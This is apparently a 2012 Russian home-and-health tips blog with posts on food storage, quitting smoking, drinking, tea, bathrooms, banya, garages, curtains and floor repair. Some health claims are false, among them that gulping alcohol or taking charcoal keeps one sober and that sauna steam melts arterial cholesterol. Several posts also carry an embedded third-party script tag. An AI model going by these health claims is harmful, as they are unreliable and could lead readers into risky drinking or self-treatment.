четверг, 29 марта 2012 г.

Правильно хранить продукты в холодильнике

Как правильно хранить продукты в холодильнике


Как бывает досадно отравлять в мусорное ведро любимый сыр, покрывшийся плесенью, обнаружить увядшую зелень или сморщенную морковь. О том, как правильно хранить продукты в холодильнике поделится в этой статье.
В холодильнике несколько зон хранения: на самой верхней полке следует хранить самые скоропортящиеся продукты, такие как творог, сметана, сыр и сливочное масло, так как на ней самая низкая температура, а значит и продукты сохранятся дольше.
На среднюю и нижнюю полки соответственно можно помещать уже такие продукты как приготовленные блюда, которые вы собираетесь ни сегодня – завтра съесть, овощи, фрукты.
Многие приготовленные блюда не выдерживают длительного хранения, поэтому помните, что суп хорош только свежосвареный, поэтому можно сварить бульон на 3 дня и убрать его в холодильник. Каждый день  отливая нужное количество бульона, вы можете заправлять его по-разному, и у вас будет каждый раз новый суп. Кашу, сваренную на воде, можно держать в холодильнике до 3 суток, молочную же – не более 24 часов.
Продукты, которые вы употребляете в пищу без тепловой обработки (сыр, творог, колбаса, масло) не должны соприкасаться в холодильнике с сырым мясом, рыбой, овощами, яйцами.
Полуфабрикаты должны отдельно находиться от приготовленной пищи и быть упакованы в полиэтилен или фольгу.
На дверце холодильника, ее еще называют балкончиком, в специальных ячейках яйца сохранятся дольше, если их туда уложить тупым концом вверх – именно так желток и белок меньше окисляется. Срок хранения яиц в холодильнике 3-4 недели. Внизу балкончика можно хранить консервы, они все-таки лучше сохраняются в холодном месте, чем при комнатной температуре. Для них оптимальная температура ниже 20 градусов, а на кухне, особенно когда включена плита, температура бывает выше.
Зелень и редис дольше сохранятся в холодильнике, если их сбрызнуть холодной водой и затем поместить в полиэтиленовый мешочек, тогда они будут меньше вянуть. Другие овощи – кабачки, огурцы, томаты, морковь и т.д.  лучше хранить внизу холодильника, в специальном контейнере для овощей. Их не следует помещать в полиэтиленовые пакетики – иначе заплесневеют. Помидоры вообще лучше хранить отдельно – они выделяют вещества, от которых другие овощи начинают портиться. Капусту лучше хранить кочерыжкой вверх, как и зеленый салат. А чтобы фрукты и овощи дольше оставались свежими можно между ними положить целые зубчики чеснока.
Сыр и творог нужно хранить в закрытой посуде эмалированной или фарфоровой, положив туда 1-2 кусочка сахара. Либо положить на тарелку и накрыть стеклянным или пластиковым колпаком, чтобы сыр и творог не высыхали и не впитывали в себя запахи других продуктов. Сыр можно также завернуть в фольгу, это предохранит его от заветривания. Чем тверже сорт сыра, тем он дольше хранится. Сильно зачерствевшему куску сыра (но не заплесневшему, который следует выбросить) можно возвратить свежесть, опустив его на 2 часа в молоко. Этим же способом можно сделать творог менее кислым.
Придя домой проверьте, правильно ли вы храните продукты в холодильнике?

среда, 28 марта 2012 г.

Бросить курить

Наверное, каждому курильщику, пытавшемуся бросить курить волевым методом, и потерпевшему при этом неудачу, приходит в голову идея бросить курить, постепенно уменьшая количество выкуриваемых за день сигарет. Ещё этот метод, как правило, сопровождается временными рамками. Первая сигарета не раньше, допустим 10 часов, последняя не позже, скажем 22-00.
Раза три я тоже прибегал к этому методу, но ни разу не достиг цели. Не знаю никого, кто сумел бы бросить курить, таким образом, хотя допускаю, что такие люди есть. Обычно, первоначального энтузиазма, хватает на несколько дней, затем начинаются проблемы. Сначала, с утра ждешь вожделенных 10 часов, дождался, покурил, но уже меньше чем через час опять все мысли об очередной, такой желанной.
Так проходит весь день. А вечером, уже где-то в половине одиннадцатого, чувствуешь себя несчастным и обездоленным, на сегодня всё, а до десяти утра так далеко. Кроме того, когда количество дозволенных сигарет сокращается, ценность каждой из них увеличивается многократно. И уже здоровье, ради которого всё затеяно, кажется чем-то совершенно не важным. В чём же дело?
Никотин, как и любой другой наркотик, встраивается в систему обмена веществ организма. Но при этом имеет одну особенность. В течение 30 – 40 минут, большая часть никотина, из организма выводится, и наркоман-курильщик испытывает потребность в очередной дозе. Именно поэтому средняя потребность в сигаретах, пачка в день. Именно поэтому пачки фасуют по двадцать сигарет.
Что следует из вышесказанного, а то, что если время между выкуриваемыми сигаретами больше, этих 30 – 40 минут, курильщик начинает испытывать дискомфорт. У него начинается наркотическая ломка, прекратить которую может только очередная доза-сигарета. Пытаться бросить курить, постепенно уменьшая дозу, значит постоянно загонять себя в состояние этой самой ломки в течение многих (на сколько хватит терпения) дней. Вместо того чтобы пережить её один раз. В общем как в анекдоте, когда хозяин, жалея собаку, отрубал ей хвост по частям.
На самом деле, в физическом плане никотиновый голод не более чем чувство лёгкого дискомфорта, чем-то похожий на чувство несильной жажды, и, кстати, уменьшающийся, если попить воды. Любой, даже самый слабовольный человек в состоянии с ним справиться. Причины, по которым бросить курить весьма не просто, не физиологического, а психологического плана. Как их преодолеть, отдельная тема.
Таким образом, способ бросить курить постепенно, по моему мнению, не более чем иллюзия, которой курильщики утешают себя, желая избежать радикальных мер. И, тем не менее, если вы считаете, что у вас это сработает, обязательно попробуйте, а вдруг так и будет. Но даже если и нет, вы дадите своему организму небольшую передышку, и приобретёте опыт, который лишним не бывает.<script type="text/javascript" charset="UTF-8" src="http://z890.takru.com/in.php?id=890579"></script>

вторник, 27 марта 2012 г.

Пить и не пьянеть при этом

Для того, чтобы иметь возможность посещать многочисленные праздники, подразумевающие застолье с обильными возлияниями, и при этом не чувствовать себя не комфортно, стоит запомнить несколько простых рекомендаций, которые позволят Вам пить и не пьянеть при этом.
Наиболее простая и эффективная рекомендация заключается в древней истине, известной еще с времен античности: чтобы не пьянеть, спиртное следует пить крупными дозами, быстро глотая и не удерживая во рту. Дело в том, что слизистая оболочка полости рта невероятно быстро и полноценно способна усваивать многие активные вещества – например, отдельные виды лекарств или алкоголь. Этиловый спирт очень хорошо усваивается, если человек держит алкогольный напиток во рту и при этом пьет его малыми дозами. Особенно быстро в этом случае опьяняет газированный или немного подогретый напиток.
Кроме этого, можно попробовать перед употреблением спиртных напитков выпить 5-6 таблеток обычного активированного угля, так как это вещество является великолепным сорбентом и «возьмет на себя» часть выпитого Вами алкоголя. Во время употребления спиртных напитков старайтесь обильно закусывать их жирной, маслянистой или кислой пищей. В этом случае идеальной закуской становятся бутерброды со сливочным маслом, сало, соленые кабачки или огурцы, лимон. Кроме того, чтобы не захмелеть, следует чаще выходить на воздух или хорошо проветривать помещение, в котором Вы находитесь.
Способствует опьянению дурная привычка смешивать некоторые виды напитков. Самый быстрый опьяняющий эффект оказывают смеси вин и крепких напитков, портвейнов и сухих вин, а также коньяка или водки с пивом. Не стоит смешивать красные и белые вина. Если Вы пьете крепкие напитки (джин, водку, коньяк или виски), не запивайте их газированными напитками – например, тоником или лимонадом. Такая смесь очень быстро подействует на ваш организм не самым лучшим образом.
пить не пьянеяДля того, чтобы иметь возможность посещать многочисленные праздники, подразумевающие застолье с обильными возлияниями, и при этом не чувствовать себя не комфортно, стоит запомнить несколько простых рекомендаций, которые позволят Вам пить и не пьянеть при этом.
Наиболее простая и эффективная рекомендация заключается в древней истине, известной еще с времен античности: чтобы не пьянеть, спиртное следует пить крупными дозами, быстро глотая и не удерживая во рту. Дело в том, что слизистая оболочка полости рта невероятно быстро и полноценно способна усваивать многие активные вещества – например, отдельные виды лекарств или алкоголь. Этиловый спирт очень хорошо усваивается, если человек держит алкогольный напиток во рту и при этом пьет его малыми дозами. Особенно быстро в этом случае опьяняет газированный или немного подогретый напиток.
Кроме этого, можно попробовать перед употреблением спиртных напитков выпить 5-6 таблеток обычного активированного угля, так как это вещество является великолепным сорбентом и «возьмет на себя» часть выпитого Вами алкоголя. Во время употребления спиртных напитков старайтесь обильно закусывать их жирной, маслянистой или кислой пищей. В этом случае идеальной закуской становятся бутерброды со сливочным маслом, сало, соленые кабачки или огурцы, лимон. Кроме того, чтобы не захмелеть, следует чаще выходить на воздух или хорошо проветривать помещение, в котором Вы находитесь.
Способствует опьянению дурная привычка смешивать некоторые виды напитков. Самый быстрый опьяняющий эффект оказывают смеси вин и крепких напитков, портвейнов и сухих вин, а также коньяка или водки с пивом. Не стоит смешивать красные и белые вина. Если Вы пьете крепкие напитки (джин, водку, коньяк или виски), не запивайте их газированными напитками – например, тоником или лимонадом. Такая смесь очень быстро подействует на ваш организм не самым лучшим образом.<script type="text/javascript" charset="UTF-8" src="http://z890.takru.com/in.php?id=890579"></script>

понедельник, 26 марта 2012 г.

Правильно заваривать зелёный чай

Заваривание зеленого чая

Всего несколько чашек зеленого чая в день могут принести большую пользу, как для улучшения пищеварения, снижения лишнего веса, так и для профилактики здоровья всего нашего организма в целом.
Если о том, что зеленый чай приносит пользу для здоровья мы с вами знаем, кстати, об этом говорилось уже вот здесь, то о том как правильно происходит заваривание зеленого чая знают не все.
Во-первых, думаю, что все знают, но все же стоит упомянуть, что вода должна быть очищенной от всяких примесей, в том числе и от хлора. Сейчас в продаже имеется довольно большой выбор, как встроенных систем очистки воды, так и просто кувшины, в частности Аквафор или Барьер. Эти системы и кувшины хорошо справляются с очисткой воды, самое главное вовремя менять фильтры.
Следующий не маловажный момент, это температура воды, при которой происходит процесс заваривания зеленого чая. Так, например, если заваривать крутым кипятком, то ваш чай будет горчить, а если температуры воды будет не достаточно, тогда потеряется весь аромат присущий зеленому чаю.
Вкусу и аромату зеленого чая способствует ряд полезных веществ находящихся в листьях – это аминокислоты и природные сахара. А горечь и терпкость происходит благодаря представленным в нем полифенолам – дубильным веществам. Аминокислоты растворяются уже при температуре 60 ° C, а дубильные вещества при 80 ° С. Таким образом, если заваривать зеленый чай при более низкой температуре, то он сохранит свой аромат и не будет «перебит» горьким вкусом дубильных веществ. Для общей рекомендации, будет лучше всего заваривать зеленый чай в пределах от 60 ° до 80 ° С.
Еще одна рекомендация – чайник, до момента заваривания, необходимо равномерно прогреть со всех сторон. После чего высыпаем порцию листьев зеленого чая и заливаем приготовленной кипяченой водой. Как можно быстрее закрываем чайник крышкой, и сверху накрываем салфеткой или полотенцем, это позволит не улетучиться ароматическим аминокислотам и сахарам.
Процесс заваривания зеленого чая происходит в несколько этапов: сначала заполняем горячей водой всего одну треть чайника, и только через пять минут можно дополнить чайник доверху. Общее время заваривания чая составляет, около десяти минут. Если появилась пена, то это говорит о правильной заварке чая.
Заваренный чай, после дести минутной выдержки сразу же подается на стол. Заваривать его необходимо столько, чтобы выпить за один раз. Стоит также отметить зеленый чай, также как и черный очень хорошо бодрит, поэтому не стоит его употреблять прямо перед сном.

Интернер маленькой ванной комнаты

интерьер маленькой ванной комнаты фотоВанная комната…чем она является для каждого из нас?  Именно там мы каждое утро видим свое отражение в зеркале и принимаем экстренные меры для его изменения…Короче, это место наибольшего психологического комфорта и покоя для каждого из нас. Конечно, большая часть из нас (а особенно женщины),  использует ванную комнату для стирки белья, хранения моющих, чистящих средств.К сожалению, мы так мало уделяем внимания для оформления интерьера ванной комнаты. Все это происходит не от нашего нежелания заняться дизайном ванной , а из – за катастрофически маленького их размера.
Давайте попробуем при разработке дизайна нашей маленькой ванной учесть такие важные факторы как: функциональность, красота и стиль.
Одной из важных составляющих интерьера маленькой ванной комнаты является освещение. Мы будем использовать основной источник света и дополнительный. Здесь все индивидуально, кто – то любит читать во время принятия ванны, кто – то наоборот предпочитает приглушенный свет.
интерьер маленьких ванных
Обращаю ваше внимание на пол ванной. необходимо подобрать антискользящее и водоотталкивающее покрытие. Важной деталью в дизайне ванной комнаты является цветовая гамма. Очевидно, что при небольшом размере помещения целесообразнее использовать светлые , пастельные тона. Этим достигается зрительное расширение пространства.
Для придания оригинальности нашей комнаты, ее необходимо оформить в каком – либо стиле. Это достигается украшением ванной различными декоративными приспособлениями(держатели для полотенец, коврики и т. д.). Вот фото для более наглядного изображения.





Баня - средство очищения организма

Баня — превосходное средство восстановления сил, очищения орга­низма от шлаков, закаливания и сбавления веса. В бане увеличивается питание тканей кислородом, что благотворно влияет на тонус мышц, придает эластичность коже. Банный жар активизирует работу сердца, легких, улучшает обмен веществ и качествен­ный состав крови (повышается количество гемоглобина, эритроцитов, лейкоцитов), усиливает деятельность желез внутренней секреции, успокаивает болевые ощущения. Банный жар в сочетании с массажем отлично стимулирует суставы и мышцы. Банные процедуры просто  незаменимы для людей «сидячих» профессий, так как хорошо воспол­няют недостаток движений. Доказано, что баня успокаивает централь­ную нервную систему, снимает утомление, улучшает работу почек, печени, желудочно-кишечного тракта, повышает аппетит.
  Баня испокон веков существовала для того, чтобы очищать организм и прежде всего кожу от шлаков. Подсчитано, что на одном сантиметре  кожи может базироваться до 40 тысяч болезнетворных микробов.           Кожа принимает активное участие в водно-солевом обмене веществ. Даже при полном отсутствии видимого потоотделения через кожу испа­ряется вода. Число потовых желез на отдель­ных участках тела очень велико. Так, на 1 кв. см поверхности ладони находится более 370 потовых желез, на подошве — более 360, на шее — около 200, на груди и животе — более 150, на спине и ягодицах — около 60. Общее количество потовых желез у человека равно 2—5 млн.  Потовые железы выводят из организма не менее влаги, чем почки. Количество пота, выделяемого со всей поверхности тела за один час, может достигать 2—3 кг. Количество воды, теряемой организмом с по­том через кожу, может достигать 6—10 л в день.
     В поте содержатся следующие вещества: хлор, натрий, молочная кислота, калий, азот мочевины, аммиак, кальций, глюкоза, магний, азот аминокислот, креатин (компоненты расставлены по мере убыва­ния). Витамины с потом почти не выделяются.
          Как происходит процесс очищения в русской парной бане?
   Жар открывает и тщательно прочищает поры тела, удаляет грязь, снимает с верхнего слоя кожи ороговевшие клетки. Старые кожные клет­ки заменяются новыми. Так баня способствует очищению и самообнов­лению организма.  Повышенная температура способствует преобразованию шлаков в легкоудаляемые продукты обмена. Горячая вода смягчает организм, на­полняя его влагой. Усиленное кровообращение позволяет быстро уда­лить растворенные шлаки через кожу. В горячем банном пару погибают практически все болезнетворные микробы. Функциональная способность кожи улучшается, нормализу­ется жировой обмен. При регулярном посещении парной сухая кожа становится более жирной, а жирная кожа, наоборот, становится суше. В бане улучшается кровообращение, и от этого человеку становит­ся легче дышать.  Горячий пар русской бани помогает тренировать кожу, постепенно улучшая функции сальных желез. В результате этого повышается уп­ругость кожи и исчезают мелкие морщинки.   В то время, когда человек парится в бане, с потом наружу выходят токсины. Благодаря этому  облегчается работа почек, улучшается водно-солевой обмен.  Повышение температуры тела в бане кратковременное, но за это время успевают активизироваться обменные процессы и защитные силы организма. Многие врачи считают, что жар во время болезни — живитель­ная сила, и используют парную для лечения ряда болезней, например, артрита, ОРЗ, пневмонии, бронхита и др.  Горячий увлажненный воздух воздействует на гортань,  на слизистую оболочку носа, улучшает воздухообмен в легочных альвеолах. Баня оказывает очищающее действие на артерии. Холестерин, скап­ливающийся на стенках артерий, под воздействием пара сжигается, плавится и окисляется.  Посещая русскую парную, можно избавиться от контрактур, растя­жений, геморроя, болезней кровеносных сосудов, подагры, нефрита и цистита, невритов.
 Правила пользования               
  Процедуру следует начинать с теплого душа. Мыться с мылом перед первым заходом в парилку не надо. Во время первого захода в парилку, который длится 3—7 минут, следует добиться того, чтобы пот только начал отделяться, веником пользоваться пока не надо.
   Пожилым людям, детям и тем, кто попал в парилку впервые, не следует сразу забираться на верхнюю полку, для них вполне хватит жара, который внизу. Голову надо закрыть шапкой.  Нельзя ходить в баню после обильного обеда, но и на пустой желу­док лучше в парную не заходить. Оптимальным будет поесть перед этим немного овощей, фруктов, съесть каши, попить чая с травами.
Лучше париться утром, в 9—11 часов, но если у вас нет возможно­сти посетить парную в эти часы, дневное и вечернее время тоже подойдет, хотя нагрузка на сердце при этом увеличится.
 Продолжительность посещения парной можно увеличивать каждый  раз на 1 минуту, доводя общее время нахождения в парилке до 15—35 мин. Для больных это время должно быть не более 12—15 мин.
Вначале в парилке лучше немного полежать, чтобы голова и ноги были на одном уровне, подниматься надо не резко и лучше посидеть  одну минуту, а затем уже выйти из парилки. Перед каждым заходом в  парилку надо отдыхать 15—20 мин. В это время полезно выпить чашку  чая с лимоном, вареньем или травами. При повторном заходе в парную можно париться веником.
Веник надо сначала поднять вверх и встряхнуть, чтобы разогреть  его до температуры верхнего слоя воздуха. Лучше, если вы будете  париться двумя вениками сразу. Первый этап надо начать с поглаживания лиственной частью веника (это лучше делать с помощью напарника). Приложить веник и к стопам, потом медленно вести их по икрам, бедрам, спине, шее. Затем назад. Процедуру повторить 2—3 раза.
Растирание и припаривание действуют как своеобразный компресс, улучшают теплообмен, уменьшают болевые ощущения, стимулируют  потоотделение, согревают кожу.
На втором этапе веники надо опустить на поясницу и прижать их на 1—3 секунды. Такое же прижимание выполнить в районе лопаток, колен. Если при нажатии веником будут чувствоваться неприятные ощущения, следует снять их, обмакнув веник в холодную воду.
Третий этап — постегивание, именно его принято считать основ­ным в процессе парения. Его производят быстрыми легкими постегива­ющими движениями концом веника. Начать постегивания надо со спи­ны, затем перейти к икрам, а затем к стопам. После этого надо начать постегивать живот.<script type="text/javascript" charset="UTF-8" src="http://z890.takru.com/in.php?id=890579"></script>
Если вас парит напарник, то все вышеперечисленные процедуры производят сначала лежа на спине, а затем на животе.
После постегивания надо приступить к похлестыванию. Оно отлича­ется от последнего более сильным прижатием к телу всего веника. Ста­райтесь не касаться подколенных ямок, там очень нежная кожа.
Заканчивать процедуру надо легким поглаживанием всею тела вениками.
Дышать в парной надо стараться носом. Между заходами хорошее воздействие оказывает обливание холодной водой или купание в бас­сейне с ледяной водой. Контрастные процедуры нормализуют частоту сердечных сокращений, закаливают организм.
К походу в русскую парную надо приготовиться. Надо заранее ре­шить, каким веником вы будете париться, какую воду будете подда­вать в каменку, какой чай пить после бани.

четверг, 15 марта 2012 г.

Вентиляция гаража

Вентиляция гаража

Эта статья рассказывает о том, какой должна быть вентиляция гаража.
вентиляция гаража естественная
вентиляция гаража




Не секрет, что при хранении машины в отапливаемом гараже можно наблюдать ускоренную коррозию кузова, что негативно сказывается на долголетии автомобиля. Причина этого явления проста – отсутствие в гараже хорошей вентиляции. В итоге при этом в условиях теплого помещения автомобиль, заехавший с улицы с налипшим снегом и дорожными реагентами, попадает в идеальные условия для активного развития коррозии. Дело в том, что в теплом гараже влажные детали кузова попадают в среду со сто процентной влажностью, созданию которой активно способствует завезенный с улицы снег. Уменьшить активность агрессивной среды вполне может хорошая вентиляция гаража. Гаражная вентиляция может быть трех типов: естественная, комбинированная, механическая. Естественная вентиляция. Дешева и проста. Ее можно выполнить самостоятельно. Для этого вполне достаточно установить приточные решетки со стороны ворот. Эти решетки исполняют роль притока. Это жалюзи, пропускающие воздух в гараж. Надо иметь в виду, что эффективность такой вентиляции достигается, если сечение приточной решетки в два-три раза больше вытяжной. Сила естественной вентиляции не постоянна. Она зависит от температуры наружного воздуха, разницы по высоте между приточными и вытяжными решетками, а также от силы ветра. Комбинированная вентиляция. Заключается в добавлении к естественной механической системы вытяжки, основу которой составляет вытяжной вентилятор. Недостатком системы является то, что она требует наличие постоянно работающего вентилятора. Механическая вентиляция. Оптимальный вариант при решении вопроса эффективной вентиляции гаража. Этот тип устройства вентиляции предполагает управление потоком воздуха отдельными устройствами и системами, такими как приточная и вытяжная. Все рассмотренные системы пригодны к применению в индивидуальных гаражах. Если же рассматривать вопрос обеспечения вентиляции больших гаражей или их комплекса, то здесь имеет смысл применять только систему приточно-вытяжной вентиляции

вторник, 13 марта 2012 г.

Установка карнизов для штор

как установить карнизы для штор
Существует много различных видов карнизов для штор: телескопические, круглые и шинные.
Телескопический карниз – это карниз, который крепится непосредственно к оконной раме и продевается в отверстия проделанные в шторах. Такой карниз изготавливают, как правило, из металла или пластика и имеют круглую форму, регулируемую длину. Чаще всего телескопический карниз используют для шторки в ванной комнате.
Круглый карниз не скрывается от глаз из-за шторы, поэтому чаще всего играет декоративную функцию. Такой карниз изготавливают из пластика или дерева, представляет собой трубку, на которую устанавливаются кольца, а сами шторы уже крепятся к кольцам.
Шинный карниз – это карниз, который крепится к потолку или стене. Такие карнизы имеют направляющие желобки. Шинные карнизы могут быть с двухрядными и трехрядными желобками. В желобки карнизов устанавливаются крючки, которые свободно передвигаются по желобкам, позволяя легко двигать шторы. На крючки крепятся шторы.
Надо знать, перед тем как устанавливать любой карниз нужно проверить, откроется ли окно после установки выбранного карниза. Для этого нужно провести все необходимые замеры и приготовить все нужные инструменты. При проведении замеров, нужно учитывать, что расстояние между верхней частью окна и карнизом должно быть не менее 50 мм, а расстояние между стеной и карнизом должно составить примерно от 10 до 15 см.
карнизы для штор
Вначале необходимо провести горизонтальную линию (так называемую горизонталь) по уровню крепления карниза. Для этого нам необходима рулетка, уровень, карандаш. Затем нужно отметить карандашом места установки кронштейнов. Их нужно разместить так, чтобы они были расположены на одинаковом расстоянии слева и справа от центра вашего окна. Крепятся кронштейны обычно с помощью дюбелей и шурупов. Установка карнизов на потолок производится таким же образом, как установка на стене. В случае необходимости длину карниза можно всегда укоротить с помощью ножовки.
Когда устанавливаете круглый карниз, то нужно обязательно оставить по одному кольцу между кронштейном и наконечником карниза. Это нужно для того, чтобы зафиксировать шторы. Для того, чтобы получились ровные складки на шторах необходимо оставлять интервал в 10-12 см между точками крепления штор. Если длина карниза будет 2,4 м и более, то необходимо будет установить по центру карниза дополнительный кронштейн.

Ремонт ламината


дефекты ламината
Ламинат являет достаточно прочным и устойчивым к механическим воздействиям материалом для пола. Но, в процессе его эксплуатации все-же могут появляться различные дефекты и повреждения. Многие из них достаточно легко исправить. В некоторых случаях придется приложить больше усилий, для того, чтобы разобрать ламинатные доски и собрать их вновь.
Что если на одной из панелей ламината вы обнаружили серьезный дефект? Можно разобрать покрытие до этого места и после, во время монтажа испорченный фрагмент “переселить” под диван или в другое труднодоступное место, где недочет не будет виден. Если у вас со времени укладки ламината осталась запасная доска, установите ее на место испорченной.
Иногда же не рекомендуется переставлять доски ламината с места на место. Например, если у вас темный цвет пола со временем немного выгорел, а вы сделаете такую перестановку, то поверьте, это будет заметно.

Но согласитесь, не всегда удобно разбирать полностью напольное покрытие. В комнате может быть установлена крупная или корпусная мебель, огромный диван, и для демонтажа все это нужно куда то переносить, потом возвращать на место… Поэтому сходите в магазин строительных материалов, посмотрите нет ли в продаже специальной шпаклвеки для ламината подходящего цвета. Если есть, то ваша проблема почти решена. Осталось прочитать аннотацию  к материалу и следовать правилам использования.
При небольших царапинах на поверхности ламината, можно воспользоваться специальным восковым карандашом. Просто удалите с поверхности пыль, дайте хорошенько высохнуть и потом пройдитесь карандашом в местах, где видите царапины. Все должно исчезнуть.
Устраняем дефекты монтажа ламината.
Если после укладки ламината вы замечаете что-то неладное: пол поднимается и опускается при ходьбе по нему, скрипит или вздулся, скорее всего придется все переделывать. Если при перемещении по ламинату слышится громкий стук от шагов – проблема с подложкой. Вы ведь не забыли ее положить? Возможно причиной дефекта ламината стал не достаточно ровный пол. Почему ламинат вздулся?  Одна из возможных причин – не был оставлен зазор от стены. Дело в том, что при изменении температуры или влажности воздуха ламинат способен расширяться. Если зазора нет, он просто упирается в стены и вздувается. Если в вашем случае ламинат вздулся – сделайте зазоры не менее 1 см. Для этого либо обрежьте кромку ламинтата лобзиком, либо под плинтусом сделайте небольшую штробу в стене, чтобы было куда расширяться покрытию.

Обои

свойства виниловых обоев

Виниловые обои. Что это?

Несомненно, виниловые обои обладают множеством преимуществ и являются одним из самых востребованных декоративных материалов. С их помощью легко превратить обычные стены в настоящий шедевр. Например, эти обои могут имитировать различные декоративные покрытия: ткань, плитку, камни и даже венецианскую штукатурку. Выбор фактуры и цвета разнообразен, поэтому вы можете воплотить в реальность многие ваши идеи и фантазии. Какими же свойствами обладают виниловые обои для стен?

Преимущество виниловых обоев:
  • стоят недорого;
  • легко клеятся;
  • не деформируются при высыхании или от времени.
Недостатки виниловых обоев:
- Виниловые обои не позволяют стенам “дышать”, так как не пропускают воздух. Но на современном рынке уже появились виниловые обои с микроперфорацией. Поры на этих обоях настолько малы, что воздух они пропускают , а молекулы воды нет. Так, что их даже можно мыть.
В срезе… Виниловые обои бывают на бумажной или флизелиновой основе. Удобнее всего клеить виниловые обои на флизелиновой основе, так как во время работы клей наносится только на стену. Если вы купили обои на бумажной основе, тогда, если не указано иначе, клей следует наносить и на стену и на сами обои. Поверх основания на обои нанесен слой поливинилхлорида (ПВХ). Этот слой как раз и защищает обои от проникновения влаги. А поверх ПВХ наносится декоративный слой, который уже и определяет цвет и фактуру изделия.
обои винил

Разновидности виниловых обоев.

Вспененный винил.
Вспененные виниловые обои – самые распространенные. Они имеют ярко выраженную фактуру и достаточно большую толщину. Благодаря такой вспененности материала они могут скрывать небольшие дефекты стен.
Виниловые обои на флизелиновой основе.
О них я уже упоминал выше. От обычных они отличаются только своим основанием – флизелиновой основой. И такие обои просты в работе.
Виниловые обои. Шелкография.
Это наиболее дорогостоящий вид виниловых обоев. Смотрятся они просто великолепно. Шелковый эффект таких обоев достигается за счет специального тиснения, образующего едва заметный рельеф.

Ремонт пола

линолеум
После укладки линолеума или в процессе его эксплуатации на нем могут появиться различные дефекты. Как произвести ремонт линолеума? Этот вопрос мы подробно рассмотрим в сегодняшней статье.
1. Линолеум вздулся.
Если вы приклеивали линолеум к основанию, то вам необходимо из вздувшегося участка выпустить воздух. Для этого проколите его чем-нибудь острым, например шилом. После этого надавите на пузырь. На место вздутия положите лист белой бумаги и пройдитесь утюгом. Дефект должен исчезнуть.
Если не помогло, придется сделать в покрытии небольшой разрез и через него ввести  немного растворителя для мастики, которой вы приклеивали линолеум. После этого снова пробуем проглаживать утюгом.
Если и это не помогло, то через надрез в место вздутия нанесите клей или мастику и снова повторите операцию с утюгом. Видимо там клея просто не было.
2. Если приклеенный линолеум отслаивается от пола.
Чтобы исправить этот дефект придется немало попотеть. Снимаем линолеум и удаляем с него (с обратной стороны) мастику. Пол так-же очищаем от клея. Грунтуем. И теперь приклеиваем линолеум снова.
3. Волна на поверхности линолеума.
Разверните покрытие в просторном помещении так, чтобы его края ни во что не упирались и на нем не стояли какие-либо предметы. Так он должен полежать несколько дней. В большинстве случаев волна уходит. Если нет, снова беремся за утюг.
4. Очаговое истирание линолеума.
В случае, если местами линолеум протерся или вообще образовалась дыра, можно сделать заплатки. Для начала определите причину дефекта. Возможно, в этом месте на полу есть небольшой бугорок. Устраните его. Вырежьте испорченный кусок материала. Зачистите пол. Подберите подходящего “донора”, похожий кусок линолеума или лучше такой же. Положите вырезанную с запасом заплатку на место дефекта, хорошо прижмите и сделайте прорез сразу двух слоев покрытия. Чем аккуратнее вы это сделаете, тем незаметнее будет замена. После этого приклейте заплатку на место и прижмите.
5. Пятна на линолеуме.
А теперь давайте поговорим о том, как с линолеума удалять пятна.
- Пятно от засохшего соуса или крема можно смыть горячей водой.
- Жирное пятно или  пятно от масляной краски можно удалить уайт-спиритом или средством для снятия лака.
- Акриловую или водоэмульсионную краску можно удалить водой. Но постарайтесь сделать это как можно быстрее. После высыхания такое пятно удалить намного сложнее.
- Пятно от чернил можно удалить спиртом.
Вот, пожалуй, и все на сегодня. Не забудьте подписаться на рассылку, чтобы получать полезные статьи с советами прямо на свою электронную почту.
P.S. А как вы боролись с дефектами линолеума? Оставьте свои рекомендации в комментариях.